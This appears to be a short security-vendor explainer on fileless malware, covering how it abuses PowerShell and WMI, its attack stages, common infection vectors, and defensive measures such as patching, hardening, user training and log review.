Fileless malware is a type of malicious software that uses legitimate programs to infect a computer. It does not rely on files and leaves no footprint, making it challenging to detect and remove. Fileless malware emerged in 2017 as a mainstream type of attack, but many of these attack methods have been around for a while. Fileless malware is sometimes considered synonymous with in-memory malware as both perform their core functionalities without writing data to disk during the lifetime of their operation.
Not like the traditional malwares, fileless malware attacks do not have any executable files or software to get installed in the victims device. In another word we can say windows is turned against itself.
Fileless malware attacks involve taking default Windows tools, especially PowerShell and Windows Management Instrumentation (WMI), and utilizing them for malicious actions, such as moving along the side to different machines.
These power shell and WMI tools are pre-installed in every windows machine and capable of doing automated tasks. For an example power shell can provide access to windows inner core and the windows API.
Using legitimate programs makes these attacks nearly undetectable by most security programs and even skilled security analysts. The reason is simple: since PowerShell and WMI are legitimate programs, any command they execute is assumed to also be legitimate.
The initial infection usually involves tricking the user into opening an infected file or visiting a malicious website. Although this is typical from malware attacks, the payload will not create files on the device’s hard-drive but instead it will reside only in memory.
The next stage of the attack varies but often includes attempting to create entries in the device’s registry for persistency or attempting to load commonly used processes such as PowerShell or Windows Management Instrumentation (WMI).
Afterwards, the infected machine may attempt to propagate onto other connected devices, attempt to download additional malware on the infected device, and attempt to download and execute scripts.
Potential Infection Vectors
- Physical transfer
Attack vector: A user connects an infected device or media into a device.
- Social Engineering (Phishing)
- Infected links
Attack vector: A user interacts with a link to a malicious website in an email.
- Infected attachments
Attack vector: A user interacts with a link to a malicious website in a document.
- Infected links
- Web application
Attack vector: A malicious actor leverages a weakness in a website to inject and execute code on any user that happens to visit the website.
- Patch and upgrade management, including staying up to date with vendor issued security advisories and application releases.
- Architect a layered IT defense environment including hardening of end points and disabling non-essential applications and services.
- Strong user awareness including encouraging users to report suspicious activity and implementing cyber security training.
- Log management including regular reviews of system logs, server logs and performing regular audits.
Like to get notified of security news by our Security Specialists? Sign up to our newsletter: